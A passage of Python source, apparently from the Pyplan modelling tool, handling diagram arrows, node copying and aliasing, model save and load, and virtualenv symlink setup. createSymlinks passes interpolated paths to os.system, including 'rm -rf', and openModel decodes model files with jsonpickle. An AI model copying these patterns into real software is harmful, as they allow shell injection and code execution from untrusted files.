nodeId = self.nodeDic[nodeId].originalId
evaluator = Evaluator.createInstance(None)
return evaluator.setNodeValueChanges(self.nodeDic, nodeId, changes)
else:
if not self.nodeDic[nodeId].originalId is None:
nodeId = self.nodeDic[nodeId].originalId
if not self.nodeDic[nodeId].result is None:
evaluator = Evaluator.createInstance(
self.nodeDic[nodeId].result)
return evaluator.setNodeValueChanges(self.nodeDic, nodeId, changes)
def getDiagram(self, moduleId=None):
"""Get diagram"""
if moduleId is None:
moduleId = self.modelNode.identifier
moduleId = self.clearId(moduleId)
res = {
"moduleId": moduleId,
"arrows": [],
"nodes": [],
"breadcrumb": []
}
nodeList = self.findNodes("moduleId", moduleId)
nodeList.sort(key=lambda x: int(x.z))
for node in nodeList:
res["nodes"].append(node.toObj(
exceptions=["definition"], fillDefaultProperties=True))
res["breadcrumb"] = self.getBreadcrumb(moduleId)
return res
def getBreadcrumb(self, moduleId=None):
    """Return the module chain from *moduleId* up to the model root.

    Each entry is {"identifier", "title"}; the root entry is always last
    and titled "Main" when the model node has no title.
    """
    if moduleId is None:
        moduleId = self.modelNode.identifier
    moduleId = self.clearId(moduleId)
    trail = []
    current = moduleId
    while current != self.modelNode.identifier and self.existNode(current):
        node = self.getNode(current)
        trail.append({"identifier": current, "title": node.title or current})
        current = node.moduleId
    trail.append({"identifier": self.modelNode.identifier,
                  "title": self.modelNode.title or "Main"})
    return trail
def isIn(self, nodeId, moduleId):
    """Return True if *nodeId* lives inside *moduleId*, walking up parents.

    The walk is capped at 99 hops (same guard as the original _secure
    counter) to protect against cyclic parent links.
    """
    current = nodeId
    for _ in range(99):
        if current == self.modelNode.identifier or not self.existNode(current):
            return False
        if current == moduleId:
            return True
        current = self.getNode(current).moduleId
    return False
def isSelector(self, nodeId):
    """Return True when the node exists and its result is a Selector instance."""
    return bool(self.existNode(nodeId)
                and isinstance(self.getNode(nodeId).result, Selector))
def getSelector(self, nodeId):
    """Return the serialized selector data, or None when the node is not a selector."""
    if not self.isSelector(nodeId):
        return None
    return self.getNode(nodeId).result.toObj()
def release(self):
    """Release the model and free all resources.

    Releases the model node and every node in the dictionary, then resets
    all internal state (node dict, model properties, scenarios, node-class
    cache and wizard).
    """
    if self._modelNode is not None:
        self._modelNode.release()

    # Bug fix: the original built a generator expression
    # `(xx.release() for xx in self.nodeDic)` that was never iterated, so
    # no node was ever released — and it iterated dict keys (strings), not
    # node objects. Release each node explicitly before dropping it.
    for key in list(self.nodeDic):
        self.nodeDic[key].release()
        del self.nodeDic[key]

    self._nodeDic = {}
    self._modelProp = {}
    self._modelNode = None
    self._scenarioDic = dict()
    self._nodeClassDic = dict()
    self._wizard = None
    return
def getNextIdentifier(self, prefix):
    """Return the next unused node identifier derived from *prefix*.

    A trailing number in the prefix seeds the counter (prefix digits are
    stripped); once the counter space is exhausted an underscore is
    appended and counting restarts at 1.
    """
    trailing = re.findall(r"(\d+$)", prefix)
    start = 1
    if trailing:
        digits = trailing[0]
        start = int(digits) + 1
        if start > 100000000:
            prefix += "_"
            start = 1
        else:
            prefix = prefix[:-len(digits)]
    for counter in range(start, 100000000):
        candidate = prefix + str(counter)
        if candidate not in self.nodeDic:
            return candidate
def clearId(self, nodeId):
    """DEPRECATED: identifiers are no longer normalized; returns *nodeId* unchanged."""
    return nodeId
def updateNodeIdInDic(self, oldNodeId, newNodeId):
    """Update node identifier on all dictionary.

    Re-keys the node under *newNodeId* and repoints every reference to the
    old id: children modules, aliases/form nodes (whose definitions are
    rewritten to "result = <newNodeId>"). Returns True on success, False
    when *oldNodeId* does not exist.
    """
    if self.existNode(oldNodeId):
        newNodeId = self.clearId(newNodeId)
        # Same node object, new key.
        self.nodeDic[newNodeId] = self.nodeDic[oldNodeId]
        # Children that lived inside the renamed module.
        for node in self.findNodes("moduleId", oldNodeId):
            node.moduleId = newNodeId
        # Aliases and form nodes pointing at the renamed node; their
        # definition is the bare reference, so rewrite it directly.
        for node in self.findNodes("originalId", oldNodeId):
            node.originalId = newNodeId
            node._definition = "result = " + str(newNodeId)
        del self.nodeDic[oldNodeId]
        return True
    else:
        return False
def setNodeProperties(self, nodeId, properties):
    """Apply a list of {"name", "value"} property updates to a node.

    A dotted name ("nodeInfo.color") sets the attribute on the named
    sub-object. Does nothing when the node does not exist.
    """
    nodeId = self.clearId(nodeId)
    if not self.existNode(nodeId):
        return
    target = self.getNode(nodeId)
    for item in properties:
        name = item["name"]
        value = item["value"]
        if "." in name:
            owner_attr, sub_attr = name.split(".")
            setattr(getattr(target, owner_attr), sub_attr, value)
        else:
            setattr(target, name, value)
def getNodeProperties(self, nodeProperties):
    """Fill in the "value" of each requested node property, in place.

    Returns the same *nodeProperties* structure, or None when no node was
    requested. Properties the node does not have are left untouched.
    """
    if nodeProperties is None or nodeProperties["node"] == "":
        return None
    node_id = self.clearId(nodeProperties["node"])
    if self.existNode(node_id):
        node = self.getNode(node_id)
        for prop in nodeProperties["properties"]:
            if hasattr(node, prop["name"]):
                prop["value"] = getattr(node, prop["name"])
    return nodeProperties
def setModelProperties(self, properties):
    """Update model-level properties.

    'identifier' and 'title' are stored on the model node, 'modelId' is
    read-only and skipped, everything else goes into modelProp.
    """
    for name in properties:
        if name == 'modelId':
            continue
        if name in ('identifier', 'title'):
            setattr(self.modelNode, name, properties[name])
        else:
            self.modelProp[name] = properties[name]
def getModelProperties(self):
    """Return model identifier, title and every custom model property."""
    properties = {
        "identifier": self.modelNode.identifier,
        "title": self.modelNode.title,
    }
    properties.update(self.modelProp)
    return properties
def getIndexes(self, nodeId):
    """Return the indexes (dimensions) of a node, honoring loaded scenarios.

    Returns None when the node does not exist.
    """
    if not self.existNode(nodeId):
        return None
    if nodeId in self._scenarioDic:
        scenario_value = self._scenarioDic[nodeId]
        evaluator = Evaluator.createInstance(scenario_value)
        return evaluator.getIndexes(self.nodeDic[nodeId], scenario_value)
    return self.getNode(nodeId).indexes
def getIndexValues(self, data: IndexValuesReq):
    """Return the values of an index node (or of a node's index).

    Falls back to data.index_id when data.node_id is empty; a scenario
    loaded over the node takes precedence over its own result.
    """
    target = data.index_id if data.node_id is None or data.node_id == '' else data.node_id
    if not self.existNode(target):
        return None
    value = self.nodeDic[target].result
    if data.node_id in self._scenarioDic:
        value = self._scenarioDic[data.node_id]
    return Evaluator.createInstance(value).getIndexValues(self.nodeDic, data, value)
def getIndexType(self, nodeId, indexId):
    """Return the data type of *indexId*, evaluated in the context of *nodeId*.

    Falls back to the index node itself when *nodeId* is empty.
    """
    target = indexId if nodeId is None or nodeId == "" else nodeId
    if not self.existNode(target):
        return None
    evaluator = Evaluator.createInstance(self.nodeDic[target].result)
    return evaluator.getIndexType(self.nodeDic, nodeId, indexId)
def getIndexesWithLevels(self, nodeId):
    """Return the indexes of a node including level info (scenario-aware)."""
    if not self.existNode(nodeId):
        return None
    if nodeId in self._scenarioDic:
        scenario_value = self._scenarioDic[nodeId]
        evaluator = Evaluator.createInstance(scenario_value)
        return evaluator.getIndexesWithLevels(self.nodeDic[nodeId], scenario_value)
    evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
    return evaluator.getIndexesWithLevels(self.nodeDic[nodeId])
def isTable(self, nodeId):
    """Return the evaluator's table flag for a node ("0" when it does not exist).

    The flag is a legacy string value produced by the evaluator.
    """
    if not self.existNode(nodeId):
        return "0"
    evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
    return evaluator.isTable(self.getNode(nodeId))
def getArrows(self, moduleId):
    """Return all arrows of moduleId.

    Builds the arrow list for the module's diagram in four passes:
    node-to-node (including aliases), node-to-module and module-to-node
    (edges that cross module boundaries are redirected to the closest
    ancestor module visible in this level), and module-to-module. An arrow
    is only added when both endpoints have their show-inputs/outputs flags
    enabled and it is not already in the list.
    """
    res = []
    modulesInLevel = []
    inputsInOtherLevel = []
    outputsInOtherLevel = []
    thisLevel = self.findNodes("moduleId", moduleId)
    thisIds = [node.identifier for node in thisLevel]
    for node in thisLevel:
        if node.nodeClass == "module":
            modulesInLevel.append(node.identifier)
    # node to node
    for node in thisLevel:
        if node.nodeClass not in ["module", "text"]:
            for outputNodeId in node.outputs:
                # aliases: consider the target node and every alias of it
                fullOutputs = []
                fullOutputs = self.findNodes('originalId', outputNodeId)
                fullOutputs.append(self.getNode(outputNodeId))
                for o in fullOutputs:
                    if not o is None:
                        element = {'from': node.identifier,
                                   'to': o.identifier}
                        if o.identifier in thisIds:
                            if node.nodeInfo.showOutputs and o.nodeInfo.showInputs:
                                if self.existArrow(element["from"], element["to"], res) == False:
                                    res.append(element)
                        elif o.identifier not in thisIds:
                            # Target is outside this level: remember it for
                            # the node-to-module pass below.
                            if self.existArrow(element["from"], element["to"], outputsInOtherLevel) == False:
                                # if theres an alias in this level don't include the arrow
                                if not len(self.getAliasInLevel(o.identifier, moduleId)) > 0:
                                    outputsInOtherLevel.append(element)
            for inputNodeId in node.inputs:
                # aliases: consider the source node and every alias of it
                fullInputs = []
                fullInputs = self.findNodes('originalId', inputNodeId)
                fullInputs.append(self.getNode(inputNodeId))
                for i in fullInputs:
                    if not i is None:
                        element = {'from': i.identifier,
                                   'to': node.identifier}
                        if i.identifier in thisIds:
                            if i.nodeInfo.showOutputs and node.nodeInfo.showInputs:
                                if self.existArrow(element["from"], element["to"], res) == False:
                                    res.append(element)
                        elif i.identifier not in thisIds:
                            # Source is outside this level: remember it for
                            # the module-to-node pass below.
                            if self.existArrow(element["from"], element["to"], inputsInOtherLevel) == False:
                                # if theres an alias in this level don't include the arrow
                                if not len(self.getAliasInLevel(i.identifier, moduleId)) > 0:
                                    inputsInOtherLevel.append(element)
    # node to module: redirect outgoing cross-level edges to the nearest
    # ancestor module that is visible in this level.
    if outputsInOtherLevel:
        for d in outputsInOtherLevel:
            newTo = []
            nodeFrom = d["from"]
            nodeTo = d["to"]
            if self.getNode(nodeTo).isin in self.nodeDic:
                newTo = self.getParentModule(nodeTo, modulesInLevel)
                if newTo:
                    element = {'from': nodeFrom, 'to': newTo}
                    if self.getNode(nodeFrom).nodeInfo.showOutputs and self.getNode(newTo).nodeInfo.showInputs:
                        if self.existArrow(element["from"], element["to"], res) == False:
                            res.append(element)
    # module to node: same redirection for incoming cross-level edges.
    if inputsInOtherLevel:
        for d in inputsInOtherLevel:
            newFrom = []
            nodeFrom = d["from"]
            nodeTo = d["to"]
            if self.getNode(nodeFrom).isin in self.nodeDic:
                newFrom = self.getParentModule(nodeFrom, modulesInLevel)
                if newFrom:
                    element = {'from': newFrom, 'to': nodeTo}
                    if self.getNode(newFrom).nodeInfo.showOutputs and self.getNode(nodeTo).nodeInfo.showInputs:
                        if self.existArrow(element["from"], element["to"], res) == False:
                            res.append(element)
    # module to module
    modulesComplete = []
    for mod in modulesInLevel:
        modulesComplete.append(
            {"module": mod, "nodes": self.getNodesInModule(mod, [])})
    for mod in modulesComplete:
        for node in mod["nodes"]:
            if self.getNode(mod["module"]).nodeInfo.showOutputs:
                tempOutputs = node.outputs
                if tempOutputs:
                    for output in tempOutputs:
                        for auxModule in modulesComplete:
                            if(mod["module"] != auxModule["module"] and self.getNode(auxModule["module"]).nodeInfo.showInputs):
                                # module to module
                                if self.getNode(output) in auxModule["nodes"]:
                                    element = {
                                        "from": mod["module"], "to": auxModule["module"]}
                                    if self.existArrow(element["from"], element["to"], res) == False:
                                        res.append(element)
                                # NOTE(review): the string below is dead code
                                # (an expression statement with no effect),
                                # kept for reference.
                                """# module to alias
                                aliases = self.getAliasInLevel(
                                    output, moduleId)
                                if len(aliases) > 0:
                                    for alias in aliases:
                                        if alias.nodeInfo.showInputs:
                                            element = {
                                                "from": mod["module"], "to": alias.identifier}
                                            if self.existArrow(element["from"], element["to"], res) == False:
                                                res.append(element)
                                            # alias to alias
                                            outputAliases = self.getAliasInLevel(
                                                node.identifier, moduleId)
                                            if len(outputAliases) > 0:
                                                for outAl in outputAliases:
                                                    if outAl.nodeInfo.showOutputs:
                                                        element = {
                                                            "from": outAl.identifier, "to": alias.identifier}
                                                        if self.existArrow(element["from"], element["to"], res) == False:
                                                            res.append(element)
                # alias to module
                if self.getNode(mod["module"]).nodeInfo.showInputs:
                    tempInputs = node.inputs
                    if tempInputs:
                        for inp in tempInputs:
                            aliases = self.getAliasInLevel(inp, moduleId)
                            if len(aliases) > 0:
                                for auxModule in modulesComplete:
                                    for alias in aliases:
                                        if alias.nodeInfo.showOutputs:
                                            element = {
                                                "from": alias.identifier, "to": mod["module"]}
                                            if self.existArrow(element["from"], element["to"], res) == False:
                                                res.append(element)"""
    return res
def existArrow(self, aFrom, aTo, arrowsList):
    """Return True when an arrow from *aFrom* to *aTo* already exists in *arrowsList*."""
    return any(arrow['from'] == aFrom and arrow['to'] == aTo
               for arrow in (arrowsList or []))
def getAliasInLevel(self, nodeIdentifier, levelId):
    """Returns the aliases in the level.

    Returns a list with the aliases of *nodeIdentifier* located in module
    *levelId*.
    """
    res = []
    aliasNodes = self.findNodes("originalId", nodeIdentifier)
    if aliasNodes is not None:
        for alias in aliasNodes:
            if alias.moduleId == levelId:
                res.append(alias)
                # NOTE(review): the break stops at the first alias found in
                # the level, so the list holds at most one entry — callers
                # only test emptiness, but confirm this is intentional.
                break
    return res
def getParentModulesWithAlias(self, moduleId, modulesArray):
    """Collect *moduleId*, its aliases and all ancestor modules (with aliases).

    Accumulates into *modulesArray* (mutated in place) and returns it.
    Recursion stops at the '_model_' root or when the parent module is not
    in the node dictionary.
    """
    if moduleId == '_model_':
        return modulesArray
    if moduleId not in modulesArray:
        modulesArray.append(moduleId)
        for alias in self.findNodes('originalId', moduleId):
            if alias.identifier not in modulesArray:
                modulesArray.append(alias.identifier)
    parent = self.getNode(moduleId).isin
    if parent in self.nodeDic:
        return self.getParentModulesWithAlias(parent, modulesArray)
    return modulesArray
def getParentModule(self, moduleId, modulesInLevel):
    """Walk up from *moduleId* to the first ancestor present in *modulesInLevel*.

    Returns None at the '_model_' root or when the parent is unknown.
    """
    if moduleId == '_model_':
        return None
    if moduleId in modulesInLevel:
        return moduleId
    parent = self.getNode(moduleId).isin
    if parent in self.nodeDic:
        return self.getParentModule(parent, modulesInLevel)
    return None
def getNodesInModule(self, moduleId, nodesInSubLevels):
    """Recursively collect the non-module, non-text nodes under *moduleId*.

    Accumulates into *nodesInSubLevels* (mutated in place) and returns it.
    """
    submodules = []
    for node in self.findNodes('moduleId', moduleId):
        if node.nodeClass == 'module':
            submodules.append(node)
        elif node.nodeClass != 'text':
            nodesInSubLevels.append(node)
    for module in submodules:
        self.getNodesInModule(module.identifier, nodesInSubLevels)
    return nodesInSubLevels
# UNUSED FULL ARROWS (NODE TO NODE WITH ALIASES)
# NOTE(review): the triple-quoted string below is dead code kept for
# reference only — as a bare string expression it has no runtime effect.
"""
def getArrows(self,moduleId):
    res=[]
    thisLevel = self.findNodes("moduleId",moduleId)
    thisIds = [node.identifier for node in thisLevel]
    for nodeId in self.nodeDic:
        if self.getNode(nodeId).nodeClass not in ["module","text"]:
            nodeInputs = []
            nodeOutputs = []
            fullNode = []
            fullInputs = []
            fullOutputs = []
            # To clear non existent aliases
            if self.getNode(nodeId).originalId:
                if self.getNode(nodeId).originalId not in self.nodeDic:
                    continue
            nodeInputs = self.getNode(nodeId).inputs
            nodeOutputs = self.getNode(nodeId).outputs
            fullNode = self.getNodeParentsAndAliases(nodeId)
            if fullNode:
                for n in fullNode:
                    if n not in thisIds:
                        fullNode.remove(n)
            if fullNode:
                if nodeInputs:
                    for i in nodeInputs:
                        fullInputs = self.getNodeParentsAndAliases(i)
                        if fullInputs:
                            for n in fullInputs:
                                if n not in thisIds:
                                    fullInputs.remove(n)
                        if fullInputs:
                            for n in fullNode:
                                for inp in fullInputs:
                                    if self.getNode(n).nodeInfo.showInputs and self.getNode(inp).nodeInfo.showOutputs:
                                        element = {"from":inp,"to":n}
                                        if element not in res:
                                            res.append(element)
                if nodeOutputs:
                    for o in nodeOutputs:
                        fullOutputs = self.getNodeParentsAndAliases(o)
                        if fullOutputs:
                            for n in fullOutputs:
                                if n not in fullOutputs:
                                    fullOutputs.remove(n)
                        if fullOutputs:
                            for n in fullNode:
                                for out in fullOutputs:
                                    if self.getNode(out).nodeInfo.showInputs and self.getNode(n).nodeInfo.showOutputs:
                                        element = {"from":n,"to":out}
                                        if element not in res:
                                            res.append(element)
    return res

def getNodeParentsAndAliases(self,nodeId):
    response = []
    aliases = []
    parentModulesAndAliases = []
    if nodeId not in response:
        response.append(nodeId)
    aliases = self.findNodes('originalId',nodeId)
    if aliases:
        for a in aliases:
            if a.identifier not in response:
                response.append(a.identifier)
    if self.getNode(nodeId).isin in self.nodeDic:
        parentModulesAndAliases = self.getParentModulesWithAlias(self.getNode(nodeId).isin,[])
        if parentModulesAndAliases:
            for m in parentModulesAndAliases:
                if m not in response:
                    response.append(m)
    return response
"""
def findNodes(self, prop, value):
    """Return all non-system nodes whose attribute *prop* equals *value*."""
    return [node for node in self.nodeDic.values()
            if getattr(node, prop) == value and not node.system]
def searchNodes(self, filterOptions):
    """Search nodes through the intellisense engine using *filterOptions*."""
    return Intellisense().search(self, filterOptions)
def getInputs(self, nodeId):
    """Return summaries (id, name, class, module) of a node's existing inputs."""
    summaries = []
    if self.existNode(nodeId):
        for input_id in self.getNode(nodeId).inputs:
            if self.existNode(input_id):
                node = self.getNode(input_id)
                summaries.append({
                    "id": input_id,
                    "name": node.title if node.title is not None else input_id,
                    "nodeClass": node.nodeClass,
                    "moduleId": node.moduleId,
                })
    return summaries
def getOutputs(self, nodeId):
    """Return summaries (id, name, class, module) of a node's existing outputs."""
    summaries = []
    if self.existNode(nodeId):
        for output_id in self.getNode(nodeId).outputs:
            if self.existNode(output_id):
                node = self.getNode(output_id)
                summaries.append({
                    "id": output_id,
                    "name": node.title if node.title is not None else output_id,
                    "nodeClass": node.nodeClass,
                    "moduleId": node.moduleId,
                })
    return summaries
def moveNodes(self, nodeList, moduleId):
    """Move every existing node in *nodeList* into *moduleId*; return moved ids."""
    moved = []
    moduleId = self.clearId(moduleId)
    if self.existNode(moduleId):
        for node_id in nodeList:
            if self.existNode(node_id):
                self.getNode(node_id).moduleId = moduleId
                moved.append(node_id)
    return moved
def copyNodes(self, nodeList, moduleId):
    """Copy nodes (and, recursively, module contents) into *moduleId*.

    Fresh identifiers are generated for every copy; afterwards each copied
    definition is rewritten so references between copied nodes point at the
    new copies, and alias originalId links are remapped. Returns the list
    of new identifiers.
    """
    res = []
    if self.existNode(moduleId):
        try:
            # Suppress change tracking / recalculation while cloning.
            self._isLoadingModel = True
            # Matches either a quoted string (group 1, kept untouched) or
            # the bare identifier {0} on word boundaries.
            rx = r"('[^'\\]*(?:\\.[^'\\]*)*'|\"[^\"\\]*(?:\\.[^\"\\]*)*\")|\b{0}\b"
            newNodesDic = dict()  # old identifier -> new identifier

            def nodeCreator(_nodeList, _moduleId):
                # Clone each node; module nodes recurse into their children.
                for nodeId in _nodeList:
                    nodeId = self.clearId(nodeId)
                    if self.existNode(nodeId):
                        obj = self.getNode(nodeId).toObj()
                        newId = self.getNextIdentifier(
                            f'{obj["identifier"]}')
                        newNodesDic[obj["identifier"]] = newId
                        obj["identifier"] = newId
                        if obj["moduleId"] == _moduleId:
                            # Copy lands in the same module: offset it so it
                            # does not overlap the source node.
                            obj["x"] = int(obj["x"]) + 10
                            obj["y"] = int(obj["y"]) + 10
                        else:
                            obj["moduleId"] = _moduleId
                        nodeObj = self.createNode(
                            obj["identifier"], moduleId=_moduleId)
                        nodeObj.fromObj(obj)
                        res.append(nodeObj.identifier)
                        if nodeObj.nodeClass == "module":
                            _childrens = [
                                node.identifier for node in self.findNodes("moduleId", nodeId)]
                            nodeCreator(_childrens, newId)
            nodeCreator(nodeList, moduleId)
            # update definitions and alias original
            for sourceNode, targetNode in newNodesDic.items():
                newNode = self.getNode(targetNode)
                currentDef = newNode.definition
                if not currentDef is None and currentDef != "":
                    tmpCode = newNode.compileDef(currentDef)
                    if not tmpCode is None:
                        names = newNode.parseNames(tmpCode)
                        for node in names:
                            if node in newNodesDic:
                                newRelatedId = newNodesDic[node]
                                # Replace bare references only; quoted
                                # strings (group 1) are preserved as-is.
                                currentDef = re.sub(rx.format(node), lambda m:
                                                    (
                                    m.group(1)
                                    if m.group(1)
                                    else
                                    newRelatedId
                                ), currentDef, 0, re.IGNORECASE)
                    # end parse definition
                    newNode.definition = currentDef
                # update allias
                if not newNode.originalId is None and newNode.originalId in newNodesDic:
                    newNode.originalId = newNodesDic[newNode.originalId]
                # regenerate
                newNode.generateIO()
        finally:
            self._isLoadingModel = False
    return res
def copyAsValues(self, nodeId, asNewNode=False):
    """ Copy node as values.

    Aliases delegate to their original node. With asNewNode=True a new
    node is first created next to the source (offset +40/+60) before the
    evaluator writes the values into it. Returns the evaluator's result,
    or False when the node does not exist.
    """
    if self.existNode(nodeId):
        node = self.nodeDic[nodeId]
        # Aliases/form nodes: operate on the original node instead.
        if node.originalId:
            return self.copyAsValues(node.originalId, asNewNode)
        result = node.result
        if asNewNode:
            # Clone geometry and definition into a nearby new node.
            newNode = self.createNode(moduleId=node.moduleId, nodeClass=node.nodeClass, x=int(
                node.x)+40, y=int(node.y)+60)
            newNode.w = node.w
            newNode.h = node.h
            newNode.definition = node.definition
            node = newNode
        evaluator = Evaluator.createInstance(result)
        return evaluator.copyAsValues(result, self.nodeDic, node.identifier)
    return False
def createInputNodes(self, nodeList):
    """Create a form (input) node for each node in *nodeList*; return new ids."""
    created = []
    if nodeList is None:
        return created
    for node_id in nodeList:
        if not self.existNode(node_id):
            continue
        anchor = self.getNode(node_id)
        original = self.getOriginalNode(node_id)
        form = self.createNode(moduleId=anchor.moduleId, nodeClass="formnode",
                               x=int(anchor.x) - 70, y=int(anchor.y) + 70,
                               originalId=original.identifier)
        form.w = 240
        form.h = 36
        form.color = original.color
        form.definition = "result = " + str(original.identifier)
        created.append(form.identifier)
    return created
def createAlias(self, nodeList):
    """Create an alias node for each node in *nodeList*; return the new ids."""
    created = []
    if nodeList is None:
        return created
    for node_id in nodeList:
        if not self.existNode(node_id):
            continue
        anchor = self.getNode(node_id)
        original = self.getOriginalNode(node_id)
        alias = self.createNode(moduleId=anchor.moduleId, nodeClass="alias",
                                x=int(anchor.x) + 30, y=int(anchor.y) + 30,
                                originalId=original.identifier)
        alias.w = int(original.w)
        alias.h = int(original.h)
        alias.definition = "result = " + str(original.identifier)
        alias.color = (BaseNode.getDefaultColor(original.nodeClass)
                       if original.color is None else original.color)
        created.append(alias.identifier)
    return created
def getOriginalNode(self, nodeId):
    """Follow originalId links from an alias/form node up to the real node."""
    if not self.existNode(nodeId):
        return None
    node = self.getNode(nodeId)
    if node.originalId is None:
        return node
    return self.getOriginalNode(node.originalId)
def isCalcNodes(self, nodeList):
    """Return a list of booleans: True where the node exists and is calculated."""
    if nodeList is None:
        return []
    return [self.getNode(node_id).isCalc if self.existNode(node_id) else False
            for node_id in nodeList]
def exportModule(self, moduleId, filename):
    """Export *moduleId* to *filename* through the module IO engine."""
    return IOModule(self).exportModule(moduleId, filename)
def importModule(self, moduleId, filename, importType):
    """Import *filename* into *moduleId* through the module IO engine."""
    return IOModule(self).importModule(moduleId, filename, importType)
def exportFlatNode(self, nodeId, numberFormat, columnFormat, fileName):
    """Export node values in flat format; False when the node does not exist."""
    if not self.existNode(nodeId):
        return False
    evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
    return evaluator.exportFlatNode(self.nodeDic, nodeId, numberFormat, columnFormat, fileName)
def dumpNodeToFile(self, nodeId, fileName):
    """Dump the node's current value to *fileName*; False when it does not exist."""
    if not self.existNode(nodeId):
        return False
    evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
    return evaluator.dumpNodeToFile(self.nodeDic, nodeId, fileName)
def saveModel(self, fileName=None):
    """Serialize the model (props + non-system nodes).

    Writes to *fileName* when given; otherwise returns the encoded text.
    """
    payload = {
        "modelProp": self.modelProp,
        "nodeList": [node.toObj() for node in self.nodeDic.values()
                     if not node.system],
    }
    if fileName:
        # `with` closes the file; the original's explicit close() was redundant.
        with open(fileName, 'w') as f:
            f.write(jsonpickle.encode(payload))
        return None
    return jsonpickle.encode(payload)
def openModel(self, fileName=None, textModel=None):
    """Open model.

    If fileName is especified then open from fileName, else open from
    textModel text. Releases the current model first, recreates the base
    model node, system and default nodes, auto-imports the xarray
    extensions library, then evaluates every node flagged evaluateOnStart.
    Returns True.
    """
    self.release()
    opened = {}
    if textModel:
        opened = jsonpickle.decode(textModel)
    else:
        with open(fileName, 'r') as f:
            opened = jsonpickle.decode(f.read())
            f.close()
    self._modelProp = opened["modelProp"]
    self._isLoadingModel = True
    # create base model node
    multiplier = 1
    hasBaseNode = False
    for obj in opened["nodeList"]:
        if obj["moduleId"] == '_model_':
            node = self.createNode(obj["identifier"], moduleId="_model_")
            # multiplier for old models
            if obj['w'] == 50 and obj['h'] == 25:
                # the model is an old model: double all node sizes
                multiplier = 2
            obj['w'] = str(int(obj['w']) * multiplier)
            obj['h'] = str(int(obj['h']) * multiplier)
            node.fromObj(obj)
            self._modelNode = node
            hasBaseNode = True
            break
    if not hasBaseNode:
        self.initialize()
    # creating system nodes
    self.createSystemNodes(fileName)
    rootModelId = self.modelNode.identifier
    # create nodes
    for obj in opened['nodeList']:
        if obj["moduleId"] != '_model_' and obj['identifier']:
            if obj["nodeClass"] in ['alias', 'formnode']:
                if hasattr(obj, 'originalId'):
                    node = self.createNode(
                        obj['identifier'], moduleId=rootModelId, originalId=obj['originalId'])
                else:
                    # NOTE(review): `obj` looks like a dict here, so
                    # hasattr() would always be False and this fallback —
                    # parsing the original id out of "result = <id>" —
                    # would be the path actually taken; confirm before
                    # changing.
                    index = obj['definition'].find('=')
                    originalId = obj['definition'][index+1:].strip()
                    node = self.createNode(
                        obj['identifier'], moduleId=rootModelId, originalId=originalId)
            else:
                node = self.createNode(
                    obj['identifier'], moduleId=rootModelId)
            obj['w'] = str(int(obj['w']) * multiplier)
            obj['h'] = str(int(obj['h']) * multiplier)
            node.fromObj(obj)
            node = None
    self.createDefaultNodes()
    # auto import pyplan_xarray_extensions
    try:
        _ppxarray = ""
        _ppxarray = os.path.join(os.path.dirname(os.path.realpath(__file__)), "extras", "pyplan_xarray_extensions.ppl")
        if os.path.isfile(_ppxarray):
            self.importModule('pyplan_library', _ppxarray, "2")
    except Exception as ex:
        raise ex
    finally:
        opened = None
        self._isLoadingModel = False
    # evaluate nodes on start
    try:
        for key in self.nodeDic:
            if self.nodeDic[key] and self.nodeDic[key].evaluateOnStart:
                _dummy = self.nodeDic[key].result
    except Exception as ex:
        print(str(ex))
        # TODO: send via channels msg to client
        pass
    return True
def closeModel(self):
    """Close the model by releasing all of its resources."""
    self.release()
def getCustomImports(self):
    """Return the result of the 'imports' node (custom python modules), if present."""
    if not self.existNode("imports"):
        return None
    return self.getNode("imports").result
def createSystemNodes(self, fileName):
    """Create system nodes.

    Creates the hidden infrastructure nodes every model needs:
    current_path (the model file's directory), pyplan_user, cub_refresh,
    pyplan_refresh, the '_scenario_' index and the task-log endpoint.
    """
    # current path
    systemPathNode = self.createNode(
        identifier="current_path", moduleId=self.modelNode.identifier)
    path = str((environ.Path(fileName)-1)() + os.path.sep)
    if self.isLinux():
        # On Linux derive the directory from the file name directly and
        # wire up the shared site-packages symlinks.
        path = fileName[:fileName.rfind("/")] + "/"
        self.createSymlinks(path)
    else:
        # Windows: escape backslashes so the path survives inside the
        # generated definition string below.
        path = path.replace("\\","\\\\")
    systemPathNode.system = True
    systemPathNode.definition = 'result="""' + str(path) + '"""'
    node = self.createNode(identifier="pyplan_user",
                           moduleId=self.modelNode.identifier)
    node.system = True
    node = self.createNode(identifier="cub_refresh",
                           moduleId=self.modelNode.identifier)
    node.system = True
    node = self.createNode(identifier="pyplan_refresh",
                           moduleId=self.modelNode.identifier)
    node.system = True
    node = self.createNode(
        identifier="_scenario_", moduleId=self.modelNode.identifier, nodeClass="index")
    node.system = True
    node.title = "Scenario"
    node.definition = "result = pp.index(['Current'])"
    node = self.createNode(identifier="task_log_endpoint",
                           moduleId=self.modelNode.identifier, nodeClass="variable")
    node.system = True
    node.title = "TaskLog endpoint"
    node.definition = "result = ''"
def createSymlinks(self, path):
    """Share the base virtualenv's site-packages with the user/public venv.

    Only runs outside the IDE (PYPLAN_IDE != "1"). Seeds the user's
    .venv site-packages from the backup copy when missing, then replaces
    /venv/.../site-packages with a symlink to it.
    """
    if os.getenv("PYPLAN_IDE","0")!="1":
        # Position of the 5th "/" — cuts *path* down to the user/public root.
        pos = path.index("/", path.index("/", path.index("/",
                         path.index("/", path.index("/")+1)+1)+1)+1)
        # Get python folder path
        # NOTE(review): sys.version[:3] yields "3.1" on Python 3.10+ —
        # fragile, though the listdir fallback below usually overrides it.
        python_folder = f"python{sys.version[:3]}"
        try:
            folder_list = os.listdir(os.path.join(path[:pos], ".venv", "lib"))
            python_folder = folder_list[len(folder_list)-1]
        except Exception as ex:
            # Keep the version-derived default when the venv lib dir is absent.
            pass
        # Add user/public library to system paths
        user_lib_path = os.path.join(path[:pos], ".venv", "lib" ,python_folder,"site-packages")
        venv_path = os.path.join("/venv","lib","python3.7","site-packages")
        if not os.path.isdir(user_lib_path):
            os.makedirs(user_lib_path, exist_ok=True)
            # copy base venv folders
            os.system(f"cp -r -u {venv_path}-bkp/* {user_lib_path}")
        # create symlink from user /public site-package
        os.system(f"rm -rf {venv_path}")
        os.system(f"ln -s -f {user_lib_path} {venv_path}")
def createDefaultNodes(self):
    """ Create default nodes as pyplan library, default imports, etc """
    # modulo pyplan library: container module for bundled helpers
    if not self.existNode("pyplan_library"):
        pyplan_library_node = self.createNode(
